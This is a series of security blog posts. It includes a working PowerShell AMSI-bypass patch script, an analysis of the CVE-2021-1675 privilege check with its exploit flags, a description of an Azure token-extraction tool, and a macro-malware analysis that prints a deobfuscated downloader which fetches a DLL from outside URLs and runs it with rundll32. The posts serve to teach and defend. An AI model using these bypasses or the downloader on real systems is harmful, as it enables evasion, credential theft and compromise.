Author: thalpius

Antimalware Scan Interface, or AMSI in short, is an interface standard for Windows components like User Account Control, PowerShell, Windows Script Host, Macro’s, Javascript, and VBScript to scan for malicious content. AMSI sits in the middle of an application and an AMSI provider, like Microsoft Defender, to identify malicious content. In this blog post, I will go through the technical details on bypassing AMSI using a technique called memory patching.

How AMSI works

When running any code in PowerShell, it is passed to AMSI first before executing. AMSI will scan for any malicious content and report back to the AMSI provider with the result. If the result is “clean,” the code is executed. If the result is “detected,” the AMSI provider blocks the execution.

Here is an illustration of the AMSI architecture.

And here is an example of AMSI blocking a “malicious” string in PowerShell.

As you can see, AMSI identified “amsiscanbuffer” as malicious, and Microsoft Defender, as an AMSI provider, blocked the content from running.

Debugging AMSI

I will use WinDbg in combination with PowerShell to perform the bypass and explain what is going on.

First, we start WinDbg and PowerShell. When we attach PowerShell to WinDbg, we can see amsi.dll is one of the loaded modules.

We can use the “x” command to examine all symbols that match a specified pattern to identify all AMSI symbols.

Luckily, Microsoft well documents the functions in Antimalware Scan Interface, which is very helpful.

Let us set a breakpoint on “amsi!AmsiScanBuffer” first and see if we can bypass AMSI.

If we look at the Microsoft documentation, AmsiScanBuffer “Scans a buffer-full of content for malware.” AmsiScanBuffer accepts multiple parameters, including the buffer to scan and the length of the buffer. If we can change the buffer or change the length of the buffer, we can probably bypass AMSI.

Do not be overwhelmed by the assembly code. Even though this blog post is not about assembly language, I will guide you through it. We can ignore most parts of the code anyway—for example, the first line of code.

mov r11, rsp

In assembly, a stack is an abstract data structure that consists of information in a Last In First Out system. To speed up the processor operations, the processor includes some internal memory storage locations, called registers. The registers differences between architectures like 16, 32, and 64 bits. In x86 assembly 16 bit, the registers are AX, BX, CX, DX, etc. With 32 bit, the registers have an “E” prepended. The “E” stands for Extended, and they never think this through for when another architecture is released because, for 64 bit, the registers have an “R” prepended. The “MOV” command moves any value from one register to the other.

So, the first line of code moves whatever is in the RSP register to the R11 register. The RSP register is the stack pointer register, and it points to the top of the stack. All the first line of code does is to preserve the address of the pointer in another register.

All of this is to explain you do not have to look at all lines of code as not everything is relevant. From now on, I will only go through the exciting parts of the code.

AMSI Bypass

Oversimplified, we skip all of the code in AmsiScanBuffer to the end of the procedure so that no scanning occurs. Without scanning, no identification of malicious code takes place.

The instruction to return from the procedure is “ret.” The return instruction is a single byte and is “c3” in hexadecimal. The first line of code contains three bytes, “41 8b f8”. We need to replace the other two instructions since we only use a single byte for the return instruction. Luckily there is an operation to fill the gaps, called a “no operation” or “nop.” A “nop” operation does nothing and is perfect for filling the gaps.

So we replace “41 8b f8” with “ret, nop, nop” or “c3 90 90” respectively.

If we continue PowerShell, we see AMSI is not detecting the malicious string.

Here is an animation of the bypass.

PowerShell Script

Rasta Mouse already created a script to patch AMSI in memory, so we use this as a starting point.

$Win32 = @"

using System;
using System.Runtime.InteropServices;

public class Win32 {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

}
"@

Add-Type $Win32

$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]0)
$Patch = [Byte[]] (0xc3, 0x90, 0x90)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 3)

The script uses GetProcAddress to retrieve the address of an exported function, which in this case, is asmi.dll. VirtualProtect changes the protection on a region to write so we can write to memory. The variable $patch is a byte array with our bytes to “patch.”

If we run this script in PowerShell, we can see that “amsiscanbuffer” is not marked as malicious anymore.

Another AMSI Bypass

Ok, back to the AmsiScanBuffer function. Before calling the function, the values for the parameters need to be pushed on top of the stack. We know that one of the parameters is the length of the buffer.

If we step through the code, we find “mov edi, r8d”. The value of register “r8d” is “1c,” which is 28 in decimal. So the length of the buffer that is check is 28 bytes. If we change this value to 0, there is no buffer to check.

If we resume PowerShell in WinDbg, we can see the “malicious” string “amsiscanbuffer” is not marked as malicious anymore.

Here is an animation of the bypass.

Conclusion

As you can see, AMSI is not hard to bypass. Even if Microsoft identifies common code used in a bypass as malicious, there are many ways to work around it. Even script-kiddies are not detected if they know they need to run a simple script to bypass AMSI before running malicious code. Hopefully, AMSI keeps updating the matching pattern where most bypasses are detected. It is a matter of time, though, when attackers create a new bypass.

I guess most of you heard about the Windows Print Spooler Elevation of Privilege vulnerability (CVE-2021-1675) in the last couple of weeks. It is a vulnerability that gives an attacker high privileges when they own a regular user account on all print spooler service-enabled devices. Unfortunately, it runs on all Windows Operating Systems by default. In this blog post, I will go into the technical aspect of this vulnerability. Remember that CVE-2021-1675 is NOT the same as the Printnightmare (CVE-2021-34527) vulnerability.

Windows Print Spooler Elevation of Privilege

Vulnerability CVE-2021-1675 is an authentication bypass vulnerability found in the AddPrinterDriverEx function.

The AddPrinterDriverEx function installs a local or remote printer driver and links the configuration, data, and driver files. According to Microsoft, “The caller must have the SeLoadDriverPrivilege” privileges to install a driver.

Using whoami, you can check which privileges you have for the current process:

To set the SeLoadDriverPrivileges privileges, you can use a local or domain policy:

Note: Default for workstation and servers administrators have these privileges and default on a domain controller it is the Administrators and Print Operators. The administrator groups’ default groups and users are Domain Administrators, Enterprise Administrators, and the administrator account.

The vulnerability found is that you can bypass the check for SeLoadDriverPrivilege privileges. So basically, any authenticated user can install a local or remote printer driver. When installing a driver, the Microsoft Windows Print Spooler service loads the driver after installing. An attacker uses this to their advantage by installing a malicious payload.

Authentication Bypass

Let us look at the AddPrinterDriverEx function first. To run this function successfully, it requires a set of parameters:

BOOL AddPrinterDriverEx(
  _In_    LPTSTR pName,
  _In_    DWORD  Level,
  _Inout_ LPBYTE pDriverInfo,
  _In_    DWORD  dwFileCopyFlags
);

The most interesting parameter is the dwFileCopyFlags parameter but more on that later.

Let us first attach the spooler service process and see what libraries are loaded. One of the dependencies used by the spooler service is localspl.dll:

Note: The library localspl.dll handles all print jobs directed to printers managed from the local server.

One of the functions localspl.dll contains is SplAddPrinterDriverEx. Here is the SplAddPrinterDriverEx function in pseudocode using Ghidra:

Here it finally gets more technical!

The issue here is that param_4, passed in the SplAddPrinterDriverEx function, is user-controllable, and later in the function, param_4 is used in an if statement.

So if you can control param_4, you can control the if statement. And guess what param_4 is: Correct, dwFileCopyFlags used in the AddPrinterDriverEx function!

So the dwFileCopyFlags, which you use as an argument for the AddPrinterDriverEx function, lets you control the if statement in SplAddPrinterDriverEx. Let us see why this is important.

Looking at the pseudocode, FUN_180020258 is the function to check if the user has SeLoadDriverPrivilege privileges. This function only runs when you enter the if statement. So, skipping this if statement skips the check for SeLoadDriverPrivilege privileges. The if statement only runs if uVar5 is not equal to 0. Luckily for us, uVar5 is set in the if statement, which we control.

To see what is going on, we need to switch to Assembly language:

The BT instruction stands for bit test. Bit Test selects the bit in a bit string (specified with the first operand, called the bit base) at the bit-position designated by the bit offset (specified by the second operand) and stores the value of the bit in the CF flag.

The bit base is DwFileCopyFlags, and the bit-position is 0xf. CMOVNC follows the BT instruction, which stands for “Move if not carry (CF=0)”.

So the bit test instruction selects a bit in DwFileCopyFlags at bit-position 0xf and stores the bit in the CF flag. CMOVNC checks if CF=0, then the condition is satisfied, and uVar5 will be the value of param_7. When uVar5 is not equal to 0, the check for SeLoadDriverPrivilege privileges never executes:

The bit base used in the bit test instruction is DwFileCopyFlags, so we need to look at those flags closer. Using WinDbg, we can see what value DwFileCopyFlags contains when executing the vulnerability:

So the value is 0x8014. When looking at the Proof of Concept code, the argument for DwFileCopyFlags is:

private const uint APD_COPY_ALL_FILES = 0x00000004;
uint flags = APD_COPY_ALL_FILES | 0x10 | 0x8000;

0x00000004 or 0x10 or 0x8000 = 0x8014:

In binary, it is 1000 0000 0001 0100. So the bit test checks if the 15th bit (0xf in hexadecimal) is equal to 0, and if it is, it will enter the if statement.

In this case, the 15th bit is a 1, and uVar5 is set, which results in skipping the SeLoadDriverPrivilege privileges check:

Here is the output of the SeLoadDriverPrivilege privileged skip in WinDbg:

Anyone that can find another combination where the 15th bit is ‘1’ can probably bypass a patch released by Microsoft.

Printnightmare

As mentioned in the beginning: CVE-2021-1675 is NOT the same as the Printnightmare (CVE-2021-34527) vulnerability. Vulnerability CVE-2021-1675 is a local elevation of privilege escalation, and CVE-2021-34527 is a remote code execution vulnerability but more on that in a future blog post!

So, in short, if the 15th bit (counting from 0) is equal to 1, the SeLoadDriverPrivilege check is skipped.

Proof of Concept

I created a C# proof of concept and pushed it to my GitHub to play with the vulnerability.

Conclusion

It took almost 1000 words to explain that the SeLoadDriverPrivilege is skipped when the 15th bit is set to one, but it is an awesome bug, and looking at the many CVE’s in the print spooler, this vulnerability will not be the last.

Special thanks go out to mez0 for not being too annoyed by my stupid questions.

When connecting to Azure using, for example, the PowerShell Az module, a JSON Web Token is created and sometimes stored in plain text on disk and memory. I will show where to find the JSON Web Tokens on disk in this blog post, including a tool I wrote to get JSON Web Tokens from memory that contains the JSON Web Tokens, including those found on disk.

JSON Web Tokens

To securely exchange information between parties, authenticating and authorizing a JSON Web Token is commonly used.

A JSON Web Token encodes any sets of identity claims into a payload, including a header that contains how it is to be signed.

The client authenticates to an Identity Provider, and the Identity Provider creates and signs, using a private key, a JSON Web Token. When the client connects to a service, it provides the signed JSON Web Token. The service validates the token using the public key of the Identity Provider and authenticates the client.

Let us look at a JSON Web Token example:

The encoded part consists of three parts: A header, a payload, and a verify signature. If you tamper with the header or payload, the signature is not valid, and the token becomes invalid.

So, in short, having a valid JSON Web Token is the key to the kingdom.

HistorySavePath

The first and most obvious path to look for JSON Web Tokens is the HistorySavePath.

HistorySavePath is a setting that saves all PowerShell console history. When a user or admin connects to Azure using PowerShell, the command is stored to file in plain text.

Note: Since HistorySavePath loads when PowerShell starts, “Microsoft JSON Web Token Extractor” also displays these tokens.

User Profile

Depending on how a user or admin connects to Azure, the following JSON files contains the JSON Web Token in plain text:

Note: Since the JSON files load when PowerShell starts, “Microsoft JSON Web Token Extractor” also displays these tokens.

Script Block Logging

Script Block Logging saves blocks of code as PowerShell executes them. When a user or admin runs the following command in PowerShell and Script Block Logging is enabled, the event viewer contains the JSON Web Token.

Note: Script Block Logging setting is disabled by default but enabled by many companies due to monitoring.

Microsoft JSON Web Token Extractor

A JSON Web Token is created in memory when connecting to Azure using PowerShell using the following command:

I wondered if I could extract the JSON Web Token from memory without dumping anything on disk to avoid a trigger from any Endpoint Detection and Response solution.

The result is a C# tool to extract all JSON Web Tokens found in memory used by PowerShell, including those found on disk.

Conclusion

My idea was to jump from on-premises to the cloud without dumping the process to disk using standard tools. The token still needs to be valid, and a user or an admin needs to connect to Azure using PowerShell, but if they do, an attacker can connect to the cloud without touching any other device in the network and stay low-profile.

Most malware creators are very creative. Hiding content, obfuscate malicious code, or trick people into clicking messages forcing the malware to run. This blog post will go through real-world Microsoft Word malware to show how nifty some malware can be.

Malicious Word Document

In this example, I will use a real-world example found on the internet. The file is a Microsoft Word document named “Form – Apr 04_2021.doc”:

The first thing you might notice is the file extension. Since .docx files cannot be used to store macros, malware creators often use the older .doc file extension.

Let us open the document and see what we got:

Multiple things should catch your attention. Obviously, the “Enable Content” message and the image forcing people to click the “Enable Content” button. There are also 5926 words, and I do not see any words showing in the Word document itself. Lets “select all” using CTRL+A to see if there is any hidden content:

That is odd. Once you select all text, it shows “5926 of 5926 words” on the bottom left. It looks like some text is behind the image. Let us remove the image to see what is behind it. Unfortunately, because of an editing restriction, the image does not move, nor can it be deleted:

Let us try and remove the restriction using the “Restrict Editing” option:

Once you click the “Restrict Editing” option, you have an option to stop the protection on the bottom right:

Once you click the “Stop Protection,” no restriction is set, and the document is editable:

Simply deleting the image shows us the 5926 words with white font and font size 2:

To see what the text contains, we select a black font and a bigger font size:

It looks like a base64 encoded string, but something is off. To understand what it is, we have to look at the macro. This particular macro uses the hidden text to create a valid base64 encoded string:

To bypass Endpoint Detection and Response, attackers obfuscate their macros. This particular macro uses the hidden text to create a valid base64 encoded string. We can try and de-obfuscate the macro, or we can enable PowerShell auditing and check the logging for the base64 encoded string.

Using a local policy, we can allow auditing to capture the base64 string used in this malware:

Enable the macro, which starts audit logging and saves the logs in the event viewer:

Now that we have auditing enabled, click “Enable Content.” The following message box will appear:

Looking in the event viewer shows us a remarkable command (sYSTEm.NeT.wEbcLIEnT) with upper and lower-case characters (often used in malware to bypass signature-based scanning):

If we scroll down, we can see the base64 encoded command:

Let us use PowerShell to decode the base64 encoded string:

Use the following command to decode the base64 string:

[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64))

Once the base64 encoded string decoded, it still does not make a lot of sense:

let us copy the code to a PowerShell editor:

A sharp eye notices the download file and rundll32, which loads a DLL file. You can see a variable that contains URLs, but it is hard to read. Let us use PowerShell to de-obfuscate the code:

The de-obfuscated code looks like this:

Set-Variable ydTUW ([type]("System.IO.Directory"))
Set-Variable uaXKHR ([type]("System.Net.ServicePointManager"))

( Get-Item variable:ydtuw  ).value::"createDirectory"($HOME + (('{\Xk8f0bt\B7mwavb\')))
( Get-Item ('variable:UAXkHr')).value::"securityprotocol" = ('Tls12')


$Vzrcqt5 = $HOME + "\Xk8f0bt\B7mwavb\G14C.dll"

$U7_xeo1 = @("hxxp://trainwithconviction.com/wp-admin/y/", "hxxp://trainwithconviction.webdmcsolutions.com/wp-admin/rEEEU/", "hxxps://perrasmoore.ca/wp-admin/rM6HK/", `
        "hxxps://canadabrightway.com/wp-admin/n3/", "hxxps://upinsmokebatonrouge.com/var/Ux1V/", "hxxps://thelambertagency.com/staging/Vo/", "hxxps://stormhansen.com/2556460492/if/")

foreach ($A8ty2bf in $U7_xeo1) {
    try {
        (.('New-Object') system.net.webclient)."downloadfile"($A8ty2bf, $Vzrcqt5)
        If ((.('Get-Item') $Vzrcqt5)."length" -ge 32213) {
            &('rundll32') $Vzrcqt5, (('anystring'))."tostring"()
            break
        }
    }
    catch {
    }
}

The URLs used in this example do not work anymore, but if you could go to the URL, it downloads a DLL file as expected. Luckily, SmartScreen blocks all URLs as well:

Recap

So what this malware does is the following:

1. Hide a base64 encoded string behind a restricted editing image.
2. Uses macros to de-obfuscate the base64 string used to download a malicious file.
3. Runs obfuscated code in PowerShell to download a malicious DLL file and runs the DLL using rundll32.

Mitigation

There are a lot of mitigations for this type of attack. As for any attack, user awareness is always critical, but here are some technical mitigations:

As you can see in the last screenshot, Microsoft Defender SmartScreen blocks malicious websites. SmartScreen scans the website for malicious content and helps to identify malicious websites by blocking them. Be sure to enable Microsoft Defender SmartScreen.

Microsoft Defender for Endpoint detects this payload since the DLL file is downloaded and scanned from the disk. More sophisticated malware using a technique called “Living off the Land”, and makes it possible to run the malware in memory and not touch the disk to bypass Endpoint Detection and Response. If the DLL file is malicious, it will get flagged by a proper Endpoint Detection and Response like Microsoft Defender for Endpoint.

Disabling macros is also an option. Not everyone needs to run macros. As it is a typical attack, disabling macros for most people should be an option.

Not accepting files with the .doc or .docm extension should mitigate this type of attack as well since .docx (the newer format) does not support macros.

The Microsoft Word document needs to be delivered to the user. A typical attack is sending the Microsoft Word document by e-mail. Microsoft Defender for Office 365 blocks most malicious payload and is one of the best mitigations for this type of attack.

As you can see, there are a lot of mitigations for this type of attack. Layered security is key here, and if properly configured, most Microsoft security products block this attack.

Conclusion

Although malware creators are very creative, one misstep will block the malware. Even if Microsoft Defender SmartScreen does not detect the malicious website, other Microsoft security products will block this attack. Luckily this malware was blocked by Microsoft Defender for Endpoint since the malicious payload is saved to disk, which makes it easy to detect. If it was not detected, the attacker would get caught in one of the next steps for sure.

Microsoft released a new detection for Microsoft Defender for Identity. The detection detects a malicious request for user accounts that do not require pre-authentication, also known as an AS-REP roasting attack. This blog post will briefly explain what an AS-REP roasting attack is and how to mitigate it.

AS-REP roasting is not a new attack. The detection by Microsoft Defender for Identity is, though. People like harmj0y and many others documented AS-REP roasting well, but since the detection is new in Microsoft Defender for Identity, I will briefly go through the attack.

Kerberos

In my previous blog post, I explained how Kerberos works but let us go over it again.

Kerberos is an authentication protocol based on tickets. The protocol is an authentication protocol developed by MIT and adopted by Microsoft since Windows 2000. Kerberos is also complicated and hard to secure.

Here is an oversimplified overview of these ticket requests:

First, the user needs to authenticate. The Authentication Service, which is part of the Key Distribution Center, handles the authentication.

Note: Within a Microsoft environment, the Key Distribution Center is the Domain Controller.

The user sends a Ticket Granting Ticket (AS-REQ) request and encrypts the timestamp in the request with the users’ password hash. The encryption of the timestamp is the pre-authentication within Active Directory. Active Directory tries to decrypt the timestamp using the users’ password hash. If the decryption works, Active Directory knows the password is correct and sends a Ticket Granting Ticket (AS-REP) back to the user.

Within Active Directory, there is an option to disable the need for pre-authentication:

When pre-authentication is disabled, there is no need to encrypt the timestamp in the Ticket Granting Ticket request, making it possible for everyone, even unauthenticated users, to request a Ticket Granting Ticket for that user.

The Ticket Granting Ticket sent back to the user is encrypted with the users’ password hash. If an attacker decrypts the ticket using a rainbow table, the attacker knows the user’s password.

Mitigation

Some non-Microsoft products require pre-authentication to be disabled. I have not seen an organization where this is needed, but if pre-authentication needs to be disabled, use a strong and generated password for the user account to be impossible for an attacker to brute-force the password. I highly recommend enabling pre-authentication for all user accounts, though.

To check which user accounts have pre-authentication disabled, use this PowerShell script:

$searcher = [adsisearcher]"(&(objectClass=user)(objectCategory=person))"
$searcher.FindAll() | ForEach-Object {
  $user = [adsi]$_.Properties.adspath[0]
  $PreAuthRequired = -not [bool]($user.userAccountControl[0] -band 0x400000)
  if($PreAuthRequired -eq $false) {
    New-Object -Type PSCustomObject -Property @{
      SamAccountName = $user.sAMAccountName[0]
    }
  }
}

Note: Run this script using a domain user. No additional module is needed to run the script.

Conclusion

Any unauthenticated user can request a Ticket Granting Ticket when pre-authentication is disabled. Even though the ticket is encrypted, an attacker can brute-force the ticket to get the users’ password. Be sure no users have pre-authentication disabled within Active Directory.